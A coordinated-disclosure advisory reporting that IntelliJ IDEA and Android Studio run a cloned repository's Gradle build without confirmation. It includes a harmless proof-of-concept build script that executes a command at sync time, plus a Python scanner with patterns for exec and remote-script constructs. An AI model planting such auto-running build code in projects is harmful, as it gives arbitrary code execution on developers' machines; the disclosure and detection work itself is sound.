Coordinated Disclosure Timeline

Summary

Upon cloning or checking out a Gradle project from an external repository (Get from VCS), both IntelliJ IDEA and Android Studio run the Gradle build task.

Products

Tested Version

Build #IC-203.5981.155, built on November 30, 2020

Build #AI-201.8743.12.41.6953283, built on November 5, 2020

Details

Issue: Code execution when cloning/checking out a repository

When cloning or checking out a repository containing a Gradle project, Android Studio and IntelliJ will try to run the build task immediately, without asking for user confirmation that would give the developer the opportunity to analyze the build script first.

If an attacker fools a developer into cloning or checking out a malicious repository, they will be able to run arbitrary code as part of the repository clone or checkout operation. For example, an attacker could hide a malware dropper using Gradle's Exec or try something more stealthy.

apply plugin: 'java'

sourceCompatibility = 1.8
targetCompatibility = 1.8

// Project.exec runs the command while the build script is being evaluated
void checkRequirements() {
    exec {
        executable 'touch'
        args '/tmp/pwned_from_gradle'
    }
}

// Configuring the build task calls checkRequirements() during the
// configuration phase, i.e. as soon as the IDE imports/syncs the project
build {
    checkRequirements()
}
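As an added, defender-side example that is not part of the GHSL advisory: a small Python pre-import check that flags Gradle build scripts in a fresh checkout which spawn processes or load remote scripts while the script is evaluated, so a developer can review them before letting the IDE sync the project. The pattern labels and the sample build script are constructed for this example.

```python
import re
from pathlib import Path

# Constructs that run a process or pull remote code while Gradle evaluates the
# build script, i.e. during the IDE's automatic import/sync of a cloned project.
# Labels are our own (constructed for this example), not Gradle terminology.
SUSPICIOUS = {
    "exec-block": re.compile(r"\b(exec|javaexec)\s*\{"),
    "process-builder": re.compile(r"\bProcessBuilder\s*\("),
    "runtime-exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\("),
    "groovy-execute": re.compile(r"\.execute\s*\(\s*\)"),
    "remote-script": re.compile(r"apply\s*\(?\s*from\s*[:=]\s*['\"]https?://"),
}

GRADLE_SUFFIXES = (".gradle", ".kts")  # Groovy and Kotlin DSL scripts


def scan_text(text, name="build.gradle"):
    """Return (file, line, label, snippet) for every suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(line):
                findings.append((name, lineno, label, line.strip()))
    return findings


def scan_repo(root):
    """Scan every Gradle build/settings script below `root` (a checkout)."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in GRADLE_SUFFIXES:
            findings.extend(scan_text(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed sample mirroring the advisory's proof of concept.
SAMPLE_BUILD = """apply plugin: 'java'

void checkRequirements() {
    exec {
        executable 'touch'
        args '/tmp/pwned_from_gradle'
    }
}

build {
    checkRequirements()
}
"""

if __name__ == "__main__":
    for file, lineno, label, snippet in scan_text(SAMPLE_BUILD):
        print(f"{file}:{lineno}: {label}: {snippet}")
```

Run `scan_repo(path_to_checkout)` on a clone before opening it in the IDE; a non-empty result means the build scripts deserve a manual read.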

When searching for similar patterns I found the exact same issue being discussed as a malware spread vector, which highlights why this issue should be addressed. In addition, a similar vulnerability (CVE-2020-17156) was recently fixed in MS Visual Studio.

Impact

Arbitrary Code Execution on repository cloning/checkout.

CVE

Resources

https://blog.jetbrains.com/blog/2021/05/07/jetbrains-security-bulletin-q1-2021/

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2020-337, GHSL-2020-338 in any communication regarding this issue.